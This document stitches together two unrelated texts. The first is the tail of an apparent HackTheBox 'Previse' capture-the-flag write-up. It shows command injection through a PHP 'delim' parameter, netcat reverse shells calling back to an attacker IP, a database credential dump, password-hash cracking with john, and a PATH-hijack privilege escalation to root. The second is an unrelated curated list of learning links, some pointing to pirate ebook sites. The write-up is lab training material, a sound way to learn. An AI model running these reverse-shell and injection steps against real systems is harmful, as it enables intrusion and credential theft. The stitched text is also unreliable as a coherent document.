0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($filepath)); ob_clean(); // Discard data in the output buffer flush(); // Flush system headers readfile($filepath); die(); } else { http_response_code(404); die(); } ?> ``` We can see the following line ```php $output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}"); ``` we can get RCE by injecting the command on ```delim``` parameter as follow: ```HTTP POST /logs.php HTTP/1.1 Host: 10.129.158.215 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 28 Origin: http://10.129.158.215 DNT: 1 Cookie: PHPSESSID=sqnl9fg82cod9iism3aikbv6uk Connection: close Upgrade-Insecure-Requests: 1 delim=| ping -c1 10.10.16.52 ``` Let's run ```tcmpdump``` to see the ```ping``` request: ```console ┌─[evyatar@parrot]─[/hackthebox/Previse/sitesbackup] └──╼ $ sudo tcpdump -i tun0 icmp [sudo] password for user: tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes 01:10:38.874941 IP 10.129.158.215 > 10.10.16.52: ICMP echo request, id 3660, seq 1, length 64 01:10:38.874993 IP 10.10.16.52 > 10.129.158.215: ICMP echo reply, id 3660, seq 1, length 64 ``` And we have RCE, Let's get a reverse shell: ```HTTP POST /logs.php HTTP/1.1 Host: 10.129.158.215 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 28 Origin: http://10.129.158.215 DNT: 1 Cookie: PHPSESSID=sqnl9fg82cod9iism3aikbv6uk Connection: close Upgrade-Insecure-Requests: 1 delim=| nc 10.10.16.52 4444 -e /bin/bash ``` Listen before to port ```4444``` using ```nc``` to get the shell: ```console ┌─[evyatar@parrot]─[/hackthebox/Previse/sitesbackup] └──╼ $ nc -lvp 4444 listening on [any] 4444 ... 10.129.158.215: inverse host lookup failed: Unknown host connect to [10.10.16.52] from (UNKNOWN) [10.129.158.215] 52588 python -c 'import pty; pty.spawn("/bin/sh")' $ whoami whoami www-data ``` We have the database credentials, Let's try to get information from DB: ```console $ export DB_PWD="mySQL_p@ssw0rd!:)" export DB_PWD="mySQL_p@ssw0rd!:)" $ mysql -u root -p$DB_PWD -e "Show databases;" mysql -u root -p$DB_PWD -e "Show databases;" mysql: [Warning] Using a password on the command line interface can be insecure. +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | previse | | sys | +--------------------+ $ mysql -u root -p$DB_PWD -e "use previse; show tables;" mysql -u root -p$DB_PWD -e "use previse; show tables;" mysql: [Warning] Using a password on the command line interface can be insecure. +-------------------+ | Tables_in_previse | +-------------------+ | accounts | | files | +-------------------+ $ mysql -u root -p$DB_PWD -e "use previse; select * from accounts;" cat acc.log.bkp id username password created_at 1 m4lwhere $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. 2021-05-27 18:18:36 3 evyatar9 $1$🧂llol$VW2XgcMA/teTJ31v.Nz44. 2021-08-09 21:53:04 ``` Let's try to crack ```m4lwhere``` hash using ```john``` with specify format ```md5crypt-long``` (It's take around 4-5 min): ```console ┌─[evyatar@parrot]─[/hackthebox/Previse/sitesbackup] └──╼ $ john --wordlist=~/Desktop/rockyou.txt --format=md5crypt-long acc.log Using default input encoding: UTF-8 Loaded 1 password hash (md5crypt-long, crypt(3) $1$ (and variants) [MD5 32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status ilovecody112235! (?) 1g 0:00:06:02 DONE (2021-08-10 01:56) 0.002760g/s 20463p/s 20463c/s 20463C/s ilovecodyb..ilovecody* Use the "--show" option to display all of the cracked passwords reliably Session completed ``` And we get the credentials of ````m4lwhere``` user which is ```ilovecody112235!```, Let's try using them on SSH: ```console ┌─[evyatar@parrot]─[/hackthebox/Previse] └──╼ $ ssh m4lwhere@10.129.158.215 m4lwhere@10.129.158.215's password: Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Mon Aug 9 22:59:01 UTC 2021 System load: 0.0 Processes: 180 Usage of /: 52.2% of 4.85GB Users logged in: 0 Memory usage: 32% IP address for eth0: 10.129.158.215 Swap usage: 0% 0 updates can be applied immediately. Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5 m4lwhere@previse:~$ cat user.txt b65d73de28b3e85d9579f71b103e3850 ``` And we get the user flag ```b65d73de28b3e85d9579f71b103e3850```. ### Root By running ```sudo -l``` we found: ```console m4lwhere@previse:~$ sudo -l [sudo] password for m4lwhere: User m4lwhere may run the following commands on previse: (root) /opt/scripts/access_backup.sh ``` Let's observe this script: ```bash #!/bin/bash # We always make sure to store logs, we take security SERIOUSLY here # I know I shouldnt run this as root but I cant figure it out programmatically on my account # This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz ``` We can change the ```PATH```, So le'ts create our ```date``` command as follow: ```console m4lwhere@previse:/tmp$ cat date /bin/nc 10.10.16.52 1111 -e /bin/bash m4lwhere@previse:/tmp$ chmod 777 date ``` Change the ```PATH``` to contain only ```/tmp``` folder to look only on our ```date``` command as follow: ```console m4lwhere@previse:/tmp$ export PATH=/t ``` Create ```nc``` listner: ```console ┌─[evyatar@parrot]─[/hackthebox/Previse] └──╼ $ nc -lvp 1111 listening on [any] 1111 ... ``` And run the ```backup.sh``` script as follow: ```console m4lwhere@previse:/tmp$ /usr/bin/sudo /opt/scripts/access_backup.sh ``` And we get root shell: ```console ┌─[evyatar@parrot]─[/hackthebox/Previse] └──╼ $ nc -lvp 1111 listening on [any] 1111 ... 10.129.158.215: inverse host lookup failed: Unknown host connect to [10.10.16.52] from (UNKNOWN) [10.129.158.215] 60052 export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin whoami root cat /root/root.txt a2fd1369de4c5b52fe9b68612d47ddd8 ``` And we get the root flag ```a2fd1369de4c5b52fe9b68612d47ddd8```.
# Awesome Open Minds Team [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) A collection of awesome useful and awesome links, resources and shiny things for our friends :smiley: . * [Awesome Open Minds Team](https://github.com/open-minds/awesome-openminds-team#Awesome-Open-Minds-Team) * [MOOC Websites](#mooc-websites) * [Freebies for students](#freebies-for-students) * [Opportunities and international exchange programs](#opportunities-and-international-exchange-programs) * [Chosen Websites](#chosen-websites) * [Studies](#studies) * [Learn to code](#learn-to-code) * [Learn Data Science](#learn-data-science) * [Open Hardware](#open-hardware) * [Design](#design) * [eBooks](#ebooks) * [Geeky websites](#geeky-websites) * [Challenges](#challenges) * [CTF (Capture The Flag- Security Challenges)](#ctfcapture-the-flag--security-challenges) * [Information Security (CTF & Hacking Platforms)](#information-security-ctf--hacking-platforms) * [Good YouTube channels to follow](#good-youtube-channels) * [Good Social media pages and groups](#good-social-media-pages-and-groups) * [Tools and Apps](#tools-and-apps) * [IDEs](#ides) * [Text editors](#text-editors) * [Design software](#design-software) * [Game Development Software](#game-development-software) * [Mobile Apps](#mobile-apps) * [Collaboration tools](#collaboration-tools) * [Podcasts](#podcasts) * [Learn Languages](#Learn-Languages) ---- ## MOOC websites *Platforms for learning awesome stuffs online* * English * [Udacity](http://udacity.com/) * [Free Code Camp](http://freecodecamp.com/) * [CodeCademy](http://codecademy.com/) * [Udemy](https://www.udemy.com/) * [Coursera](http://coursera.org/) * [Alison](http://alison.com/) * [Edx](http://edx.org/) * [CodeSchool](http://codeschool.com/) * [Pluralsight](https://www.pluralsight.com/) * [Lynda](https://www.lynda.com/) * [Sololearn](https://www.sololearn.com/) * [Khan Academy](https://www.khanacademy.org/computing) * [Skillshare](https://www.skillshare.com/) * [Shaw Academy](https://www.shawacademy.com/) * [FrontendMasters](https://frontendmasters.com/) * [A Cloud Guru](https://acloudguru.com/) * [BitDegree](https://www.bitdegree.org/) * [Thinkster](https://thinkster.io/) * [The Coding Train](https://thecodingtrain.com/) * Arabic * [Nadrus](http://nadrus.com/) * [Coursat](http://www.coursat.org/) * [Edraak](https://www.edraak.org/) * [Rwaq](https://www.rwaq.org/) * [code4learn](https://code4learn.teachable.com/) * [Barmej](https://www.barmej.com/) * French * [Openclassrooms](http://openclassrooms.com/) * [FUN](https://www.fun-mooc.fr/) * Portuguese * [Alura](http://alura.com.br) * [Curso Em Video](https://www.cursoemvideo.com/) * [Estudonauta](https://www.estudonauta.com/) * Indonesia * [Codepolitan](https://www.codepolitan.com/) - Website Belajar Coding Bahasa Indonesia * [Sekolah Koding](https://sekolahkoding.com/) - Belajar Programming, Mulai dari Nol * [Baledemy](https://baledemy.com/) - Belajar Online Website, Desain Grafis Dan Digital Marketing * [Belajarpython](https://belajarpython.com/) - Situs Open Source Tutorial Pemrograman Python Bahasa Indonesia * [BuildWithAnnga](https://buildwithangga.com/) - Pelajari keahlian baru yang dibutuhkan Startup/perusahaan IT terbesar di dunia ## Freebies for students *Because we love you* * [Github Student pack](https://education.github.com/) * [JetBrains free students pack (All IDEs for free)](https://www.jetbrains.com/shop/eform/students) * [Atomic.io (free for students)](https://atomic.io/education/) * [indico](https://indico.io/non-commercial) API for text and image analysis. * [Free Astah Professional license for students](http://astah.net/student-license-request) Software Design Tools for Agile teams with UML, ER Diagram, Flowchart, Mindmap and More * [Microsoft Dev Essentials (Free Subscriptions to cloud services, tools and Learning platforms like PluralSight, DataCamp and WintellectNow)](https://visualstudio.microsoft.com/fr/dev-essentials/) * [Gitpod](https://www.gitpod.io/pricing/) Students get the Unlimited plan for €8 per month. * [Figma](https://www.figma.com/education/) Figma is a design and prototyping app. Students get a special education plan for free. * [Notion](https://www.notion.so/students) Notion is a workspace for your tasks, notes and more. It is free for all students. * [Free for dev](https://free-for.dev/) This is a list of software (SaaS, PaaS, IaaS, etc.) and other offerings that have free tiers for developers. * [Tableau for Students](https://www.tableau.com/academic/students) Get a free license to Tableau's data visualization software! * [Shodan Membership](https://help.shodan.io/the-basics/account-faq) Get a free membership + Educational API plan for the [Shodan](https://www.shodan.io/) search engine * [CloudApp](https://www.getcloudapp.com/education) Cloud App is an instant cloud based GIF, screenshots, and video sharing product for collaboration. Students get a free pro account. ## Opportunities and international exchange programs * [Aiesec](https://aiesec.org/) Find international internships, volunteering opportunities. * [For9a - فرصة](https://www.for9a.com/) Find your passion, learn new skills, and find free opportunities at home and abroad. * [Marj3](https://www.marj3.com/) MENA #1 Platform for Scholarships, Opportunities and Universities enrollment around the world. ## Chosen Websites ### Studies * [Free computer sciences lecture courses](http://learnerstv.com/Free-Computer-Science-video-lecture-courses.htm) * [Path to self-taught education in computer science](https://github.com/open-source-society/computer-science) * [Google: Guide to technical development ](https://www.google.com/about/careers/students/guide-to-technical-development.html) * [MiftaSintaha's YouTube channel](https://www.youtube.com/channel/UC6-g6xhqyX14ENhZBC2fznw) : Computer sciences video tutorials * [Cours, TDs, TPs, Examens de l'Université d'Oran 1](https://sites.google.com/site/weshare4student/home): par Khadidja BOUKREDIMI * [Exo7 Math](http://exo7.emath.fr/) Des cours, des exercices et des vidéos de mathématiques * [Saïd Chermak](https://www.youtube.com/user/infomaths) Cours de mathématiques, probabilitéss ... * [CS Video Courses](https://github.com/Developer-Y/cs-video-courses) List of Computer Science courses with video lectures * [Awesome CS courses](https://github.com/prakhar1989/awesome-courses) * [Math, sciences, physics video courses](https://github.com/Developer-Y/math-science-video-lectures) * [Mathrix Videoa](https://www.youtube.com/channel/UCdH4RLzP9UIxV299clvj1rg/featured) Des cours et exercices vidéos corrigés pour réviser ton programme de collège et brevet ou lycée et bac. * [Ency education](http://www.univ.ency-education.com/) vous trouverez sur cette plateform des cours et examens qui vous accompagnerons tout au long de votre cursus (Math ou Informatique ) * [Université en ligne](http://uel.unisciel.fr/) Coherent selection of resources & Multimedia for students. ### Learn to code * [Johny Lists: 22 Websites to Teach You How to Code](https://johnnylists.com/post/125433243333/22-websites-to-teach-you-how-to-code) * [Tutorialspoint](www.tutorialspoint.com/) * [Enlight](https://enlight.nyc/) learn to </> by building projects * [The Odin Project](http://www.theodinproject.com/) * [Superhero.js](http://superherojs.com/) * [DevDocs](http://devdocs.io/) multiple API documentations * [PyVideo](http://pyvideo.org/) Collection of python videos * [Nodeschool](https://nodeschool.io/#workshoppers) Learn Node from the command line * [Video2brain](https://www.video2brain.com/) Courses online, focus on programming, animation, design, marketing and enterprise software * [Platzi](https://platzi.com/) Learn technology with live classes and real-time interaction * [Gitignore.io](https://www.gitignore.io) Create Useful .gitignore Files For Your Projects * [Exercism](http://exercism.io/) Code practice and mentorship for everyone * [w3schools](https://www.w3schools.com/) W3Schools is optimized for learning, testing, and training. * [GFG:Geek For Geeks](https://www.geeksforgeeks.org/): one platform to learn DSA, programming languages, preparing for gate and for all cs students * [Code Monk](https://www.hackerearth.com/practice/codemonk/): Codemonk is a curated list of topics to help you improve your skills in the fundamental concepts of programming * [JetBrains Academy](https://hyperskill.org/): Coding challenges and projects * [Codeasy.net](https://codeasy.net/): story based learning of C# that requires programming skills to navigate your work through. * [ELIS e-learning portal](https://free.aicte-india.org/ms-products.php): Over 1526 **free** course modules from Microsoft in collaboration with AICTE. * [FreeCodeCamp](https://www.freecodecamp.org/learn/): platform to learn Web Design, DSA, ML, etc. * [Full Stack Open 2020](https://fullstackopen.com/en/): Modern Web Development (Learn React, Redux, Node.js, MongoDB, GraphQL and TypeScript) ### Learn Data Science * [Data Camp](https://www.datacamp.com/): The first and foremost leader in Data Science Education. * [Data Science : R Basics](https://courses.edx.org/courses/course-v1:HarvardX+PH125.1x+2T2019): Course about R basics presented by Harvard University * [Kaggle: Intro to Machine Learning](https://www.kaggle.com/learn/intro-to-machine-learning): Learn the core ideas in machine learning, and build your first models. * [Data quest](https://https://www.dataquest.io/): From intro do advanced data science and analytics content in short lessons. * [Neural Networks from Scratch](https://www.youtube.com/playlist?list=PLQVvvaa0QuDcjD5BAw2DxE6OF2tius3V3): A youtube playlist to learn neural networks from scratch using python ### Open Hardware * [Autodesk Circuits](https://circuits.io/) A web-based Arduino simulator * [S4A](http://s4a.cat/) Based on Scratch, learn, teach your kids Arduino ### Design * English * [Mir Rom](https://www.youtube.com/channel/UCEoyp41c5FU0JoImJy8rPzw): Photoshop * [Nick Saporito](https://www.youtube.com/channel/UCEQXp_fcqwPcqrzNtWJ1w9w): Inkscape * [Mobbin](https://mobbin.design/patterns): Inspiration * [Coolors](https://coolors.co/): Color palette generator for web design * [color Hunt](https://colorhunt.co/): color palette available which are used by many web designers. * Arabic * [Mostafa Makram](https://www.youtube.com/channel/UCRuf3R3TBHYcnnYIPvuwQmQ): Photoshop * Indonesia * [Build With Angga](https://buildwithangga.com/): Coding (UI/UX), Design ### eBooks * [Free programming books](https://github.com/EbookFoundation/free-programming-books) Freely available programming books * [it-ebooks](http://it-ebooks.info/) * [LibreBooks](http://librebooks.org/) * [ebook-dl](http://ebook-dl.com/) * [Library Genesis](http://gen.lib.rus.ec/) * [Free Book Spot](http://www.freebookspot.es/) * [Free Computer Books](http://freecomputerbooks.com/) * [FreeTechBooks](http://www.freetechbooks.com/) * [JSbooks](https://jsbooks.revolunet.com/) * [OnlineProgrammingBooks](http://www.onlineprogrammingbooks.com/) * [E-Books Directory](http://www.e-booksdirectory.com/) * [Free eBooks](http://books-pdf.blogspot.com/) * [All IT eBooks](http://www.allitebooks.com/) * [B-OK](http://b-ok.org/) * [forcoder.org](http://forcoder.org/) IT ebooks and e-Learning videos for download * [Packtpub](https://www.packtpub.com/) Free ebook available daily #### Programming eBooks * [JAVA FR](https://drive.google.com/open?id=0B1IcqtFWVMxMRXhEOWs3b1NSd3c) * [C FR](https://drive.google.com/open?id=0B1IcqtFWVMxMOGMxdjZQc0lxajQ) * [Python FR](https://drive.google.com/file/d/1MCRitlnWT6TpqVdUVyHfqDF3YhPXo8Kr/view) * [A Brief Introduction to Machine Learning for Engineers](https://arxiv.org/pdf/1709.02840.pdf) * [Computational Thinking](https://www.cs.cmu.edu/~15110-s13/Wing06-ct.pdf) ### Geeky websites * [Scotch.io](https://scotch.io) * [EggHead](https://egghead.io) * [SitePoint](https://www.sitepoint.com/) * [FreeCodeCamp News](https://www.freecodecamp.org/news/) * [CSS Reference](http://cssreference.io/) a free visual guide to CSS * [uxdesign.cc](https://uxdesign.cc/) User Experience, Usability, Product Design * [OverAPI.com](http://overapi.com/) Collecting All Cheat Sheets * [The list for web designers](https://www.designerslist.info/) A complete toolkit for web designers, wireframes, tutorials, blogs, tools, stock photos, fonts, color schemes, icons... * [Dev community](https://dev.to/) A constructive and inclusive social network for developers. Open source and radically transparent. #### Challenges * [Leet Code](https://leetcode.com/problemset/algorithms/): A website with more than 1500 programming questions. Organizes weekly and biweekly contests throughout the year. * [Hacker Rank](https://www.hackerrank.com/) : a platform for beginners to pros with tutorials and editorials . best for getting started with programming. * [GUVI](https://www.guvi.in/) * [Hacker Earth](https://www.hackerearth.com/) * [Project Euler](https://projecteuler.net/archives) * [Code Wars](https://www.codewars.com/) * [Rosalind](http://rosalind.info/problems/list-view/): A platform for learning bioinformatics through problem solving. * [CoderByte](https://coderbyte.com/): An alternative for HackerRank. Also, it is the #1 website for technical interview prep. * [Codechef](https://www.codechef.com/): Hosts monthly competitve programming competitions, and has a vast variety of practice problems. * [CodeSignal](https://app.codesignal.com/): A competitive platform for programmers * [codeforces](https://www.codeforces.com/): best for competitive programming * [codingame](https://www.codingame.com/): Coding game and programming challenges to code better * [Timus Online Judge](http://acm.timus.ru/): An online archive for programming problems and automatic judging system. * [InterviewBit](https://www.interviewbit.com/): Similar to LeetCode and HackerRank with lots of free questions and contests. * [SPOJ](https://www.spoj.com/): Sphere Online Judge (SPOJ) is an online judge system with over 640,000 registered users and over 20,000 problems. * [Rosetta Code](http://www.rosettacode.org/wiki/Rosetta_Code): The idea is to present solutions to the same task in as many different languages as possible, to demonstrate how languages are similar and different, and to aid a person with a grounding in one approach to a problem in learning another. * [Edabit](http://www.edabit.com): Learn to code with fun, bite-sized challenges. It's like Duolingo for learning to code. #### CTF (Capture The Flag - Security Challenges) * [Root Me](https://www.root-me.org/): a platform for everyone to test and improve knowledge in computer security and hacking. * [HACKER101](https://ctf.hacker101.com/): a free class for web security. * [picoCTF](https://picoctf.org/): a free computer security game for middle and high school students. * [Echo CTF](https://echoctf.com/): is a pioneer computer security framework, a Cyber Range developed by Echothrust Solutions for running security related competitions (CTFs) and trainings on real IT infrastructure. * [Over The Wire](https://overthewire.org/wargames/): offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games. * [CTFtime](https://ctftime.org/): Capture The Flag, CTF teams, CTF ratings, CTF archive, CTF writeups. #### Information Security (CTF & Hacking Platforms) * [HackTheBox](https://www.hackthebox.eu/): An online platform to test and advance your skills in penetration testing and cyber security. Join today and start training in our online labs. * [VulnHub](https://www.vulnhub.com/): provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks. * [Awesome Curated List of Environments and Platforms for Hacking and CTFs!](https://mrtaharamine.blogspot.com/2018/02/hacking-environments-and-platforms.html) * [TryHackMe](https://tryhackme.com/) :: A wonderful learning platform for Cyber Security ethusiasts with dedicated Virtual Machines and fun challenges. #### Français * [Le Hollandais Volant](http://lehollandaisvolant.net/) Astuces et tutoriels informatique ### Good YouTube channels * Arabic * [ElZero WebSchool](https://www.youtube.com/user/OsamaElzero) : Web design tutorials * [TheNewBaghdad](https://www.youtube.com/user/alxs1aa) : Programming & Software engineering tutorials * [Abdullah Eid](https://www.youtube.com/user/abdullaheidtv) : Programming tutorials (One of the best JAVA tutorials) * [Muhammed Essa](https://www.youtube.com/user/muhammedgalaxy) : Programming & Networking tutorials * [Free4Arab](https://www.youtube.com/user/Nourelhoda2011) : IT courses (CISCO, CEH, Compatia, RHCE...) * [EgyCoder](https://www.youtube.com/channel/UCmrvsMQhv5G7pWSDnLRwoJg) * [Arab GNU/Linux](https://www.youtube.com/user/abdulmogeeb) * [Mjma3](https://www.youtube.com/user/Mjma3Academy/playlists) * [Ali Hamdi](https://www.youtube.com/channel/UChiajEj7cSVoY0k2FDlM2zA) Web developement & web design tutorials * [Hassouna academy](https://www.youtube.com/user/HassounaAcademy/playlists): Everything related to computer and its sciences, web design and software * [Programming with Mosh](https://www.youtube.com/user/programmingwithmosh) programming tutorials * [MIT CSE Lectures](https://www.youtube.com/c/mitocw/playlists?view=50&sort=dd&shelf_id=5) Cours complets d'informatique du MIT. * English * [Derek Banas](https://www.youtube.com/user/derekbanas) * [The new Boston](https://www.youtube.com/user/thenewboston) * [DevTips](https://www.youtube.com/user/DevTipsForDesigners) * [Adam Khoury](https://www.youtube.com/channel/UCpzRDg0orQBZFBPzeXm1yNg) * [CodeGeek](https://www.youtube.com/channel/UCJYhP1lceSUc1bg0LRBUvqA) * [CS Dojo](https://www.youtube.com/channel/UCxX9wt5FWQUAAz4UrysqK9A): Set of quality videos about programming and computer science here * [Hak5](https://www.youtube.com/user/Hak5Darren): Hak5 has been developing innovative penetration testing devices, award winning online media, and immersive information security training since 2005. * [BracKeys](https://www.youtube.com/user/Brackeys) a must have for Unity3D users * [Sentdex](https://www.youtube.com/user/sentdex) Python tutorials from basics to NLP, Computer vision and Machine learning * [freeCodeCamp](https://www.youtube.com/channel/UC8butISFwT-Wl7EV0hUK0BQ) Technical courses with no ads * [Extra Credits](https://www.youtube.com/user/ExtraCreditz) everything related to games development * [Traversy Media](https://www.youtube.com/user/TechGuyWeb) Tutorials related to Web Development * [The Cherno](https://www.youtube.com/user/TheChernoProject) Great C++ series as well as Game Development * [Errichto](https://www.youtube.com/channel/UCBr_Fu6q9iHYQCh13jmpbrg) Algorithms, competitive programming, coding interviews taught by finalist of multiple big programming competitions like ICPC, Facebook Hacker Cup and Google Code Jam * [Open Source Developer Advocate](https://www.youtube.com/c/eddiejaoude/), BELIEVES OPEN SOURCE IS FOR EVERYONE! YES YOU! * [Techie-Workshops](https://www.youtube.com/c/PraveenKumarPurush/), Techie-Workshops by Praveen Kumar * [LetsUpgrade](https://www.youtube.com/c/LetsUpgrade/), A Technology Community for Career Acceleration * [Fun Fun Function](https://www.youtube.com/c/funfunfunction) A fun, personal and down-to-earth show about programming * [Code with harry (Hindi)](https://www.youtube.com/c/CodeWithHarry), Tutorials for python, java, javascript. Helps beginners in making their projects with easiness. Every solution is provided and contains every field of computer science. * [NetNinja](https://www.youtube.com/channel/UCW5YeuERMmlnqo4oq8vwUpg): Tuturials for learning HTML, Git & more * [Tech With Tim](https://www.youtube.com/channel/UC4JX40jDee_tINbkjycV4Sg) Awesome Tutorials for Python, AI for games and Machine Learning basic * [OnlineTutorials](https://www.youtube.com/channel/UCbwXnUipZsLfUckBPsC7Jog): Tutorials for Front-end, creative Front-End tutorials using HTML/CSS/JS. * [Adam Wathan](https://www.youtube.com/c/AdamWathan): He is creator of Utility-based CSS Framework Tailwind CSS and uploads videos regarding the designing of sites with TailWind CSS. * [Program with Erik](https://www.youtube.com/channel/UCshZ3rdoCLjDYuTR_RBubzw):He mostly uploads videos on Vue and does collaboration with other creators too. * [this.stephie](https://www.youtube.com/channel/UCr8BLoBSZtmVr31UEfCiQfA):A wonderful female content creator, especially posts about Vue.js * [Web Dev Simplified](https://www.youtube.com/channel/UCFbNIlppjAuEX4znoulh0Cw): Web Dev Simplified is all about teaching web development skills and techniques in an efficient and practical manner. * [Academind](https://www.youtube.com/c/Academind): Academind is a programming-oriented channel maintained by Maximilian Schwarzmüller and Manuel Lorenz. * Français * [Grafikart.fr](https://www.youtube.com/user/grafikarttv) * [LES TEACHERS DU NET](https://www.youtube.com/user/hounwanou1993) * [Développement Facile](https://www.youtube.com/user/developpementfacile/videos) * Portuguese * [Loiane Groner](https://www.youtube.com/user/Loianeg) * [Curso em Vídeo](https://www.youtube.com/user/cursosemvideo) * [Código Fonte TV](https://www.youtube.com/user/codigofontetv) * [Rocketseat](https://www.youtube.com/channel/UCSfwM5u0Kce6Cce8_S72olg) * [Filipe Deschamps](https://www.youtube.com/channel/UCU5JicSrEM5A63jkJ2QvGYw) * [Fabio Akita](https://www.youtube.com/user/AkitaOnRails) * [Diolinux](https://www.youtube.com/channel/UCEf5U1dB5a2e2S-XUlnhxSA) * [Codeshow](https://www.youtube.com/user/brunovegan) * [Gabriel Pato](https://www.youtube.com/channel/UC70YG2WHVxlOJRng4v-CIFQ) * [Linux Tips](https://www.youtube.com/user/linuxtipscanal) * [RafaelGomex](https://www.youtube.com/c/RafaelGomex) ### Good Social media pages and groups * Facebook pages * [Team Open Minds Oran](https://www.facebook.com/open.minds.oran/) Our Facebook page :heart: * [Dz Développeurs](https://www.facebook.com/Dz.Developpeurs/) A cool Facebook page shares projects made by Algerians, useful programming posts, geeky memes, etc. * Facebook groups * [DZ DÉVELOPPEURS](https://www.facebook.com/groups/dzdevs/) The largest Algerian developers community on Facebook ### Awesome repositories * Game design * [AwesomeJetLight](https://github.com/JetLightStudio/AwesomeJetLight) * Curriculum Vitae Template * [CV Template with Latex](https://github.com/saidziani/CV-Template) * A long list of (advanced) JavaScript questions, and their explanations * [A long list of (advanced) JavaScript questions, and their explanations](https://github.com/lydiahallie/javascript-questions) * Algorithms and data structures implemented in JavaScript with explanations and links to further readings. * [Algorithms and data structures implemented in JavaScript](https://github.com/trekhleb/javascript-algorithms) * Learn how to design large-scale systems. Prep for the system design interview. Includes Anki flashcards. * [System Design Primer](https://github.com/donnemartin/system-design-primer) * GitHub Repository where we can play Chess. It depicts an awesome use of GitHub Actions. * [Play Chess](https://github.com/timburgan/timburgan) * A GitHub Repository where we can go through a whole Computer Science Degree. * [Open Source Computer Science](https://github.com/ForrestKnight/open-source-cs) * An awesome Data Science repository to learn and apply for real world problems. * [Awesome Data Science](https://github.com/academic/awesome-datascience) ## Tools and Apps ### IDEs * JetBrains' Intellij IDEs * [IDEA](https://www.jetbrains.com/idea/) (Java) * [WebStorm](https://www.jetbrains.com/webstorm/) (JavaScript -including Node.js- & frontend technologies, Go) * [PyCharm](https://www.jetbrains.com/pycharm-edu/) (Python) * [PhpStorm](https://www.jetbrains.com/phpstorm/) (PHP web development) * [Clion](https://www.jetbrains.com/clion/) (C/C++) * [Rider](https://www.jetbrains.com/rider/) (C#/ASP.NET/F#) * [RubyMine](https://www.jetbrains.com/ruby/) (Ruby) * [DataGrip](https://www.jetbrains.com/datagrip/) (Databases) * [CodeBlocks](http://codeblocks.org/) * [Repl.it](https://repl.it/) * [Visual Studio](https://visualstudio.microsoft.com/) ### Text editors * [Atom](http://atom.io/) * [Brackets](http://brackets.io/) * [Sublime Text](https://www.sublimetext.com/) * [Vim](https://vim.sourceforge.io/) * [Visual Studio Code](https://code.visualstudio.com) * [VSCodium](https://github.com/VSCodium/vscodium) Free/Libre Open Source Software Binaries of VSCode * [MonoDevelop](http://www.monodevelop.com/download/) * [Notepad++](https://notepad-plus-plus.org/downloads/) ### Extensions for Text editors * **Visual Studio Code** * [REST Client](https://marketplace.visualstudio.com/items?itemName=humao.rest-client) * [Jest](https://marketplace.visualstudio.com/items?itemName=Orta.vscode-jest) * [Code Spell Checker](https://marketplace.visualstudio.com/items?itemName=streetsidesoftware.code-spell-checker) * [Todo Tree](https://marketplace.visualstudio.com/items?itemName=Gruntfuggly.todo-tree) ### Design Software * [Krita](https://krita.org/en/) An end-to-end solution for creating digital art files * [Tilt Brush](https://www.tiltbrush.com/) Tilt Brush lets you paint in 3D space with virtual reality. ### Game Development Software * [Unity] (unity3d.com) Unity is a free, cross-platform, widely used and most popular 3d engine. * [GB Studio](https://www.gbstudio.dev) GB Studio is a free and easy to use retro adventure game creator for Game Boy available for Mac, Linux and Windows. * [Godot Engine](https://godotengine.org) Godot is completely free and open-source under the very permissive MIT license. * [BuildBox](https://www.buildbox.com) No-Code mobile game development. * [LÖVE](https://love2d.org) LÖVE is a framework you can use to make 2D games in Lua. It's free, open-source, and works on Windows, Mac OS X, Linux, Android and iOS. * [Defold](https://defold.com) Defold is a free to use, source available, game engine with a developer-friendly license. Defold is owned and developed by the Defold Foundation. * [Cocos2d-x](https://www.cocos.com/en/cocos2dx) Cocos2d-x is a mature open source cross-platform game development framework that supports 2D and 3D game creation. * [Phaser](http://phaser.io) Phaser is a fun, free and fast 2D game framework for making HTML5 games for desktop and mobile web browsers, supporting Canvas and WebGL rendering. * [threejs](https://threejs.org) The aim of the project is to create an easy to use, lightweight, 3D library with a default WebGL renderer. ### Online Text editors * [Regular Expressions 101](https://regex101.com/): For testing Regex * [CodePen](https://codepen.io/): Online code editor for web developers (Javascript, HTML, CSS) ### Mobile Apps * [CamScanner](https://www.camscanner.com/user/download) * [SoloLearn](http://sololearn.com/) * [Evernote](https://appcenter.evernote.com/) * [Laverna](https://laverna.cc): Multi-platform note taking solution. * [Mimo](https://getmimo.com/): Learn how to code on your phone * [Lrn](http://lrnapp.com/): Learn to code at your convinience * [Grasshopper](https://grasshopper.codes/) * [&lt;enki/&gt;](https://enki.com/join/Fcmam5) The #1 app to level up data science 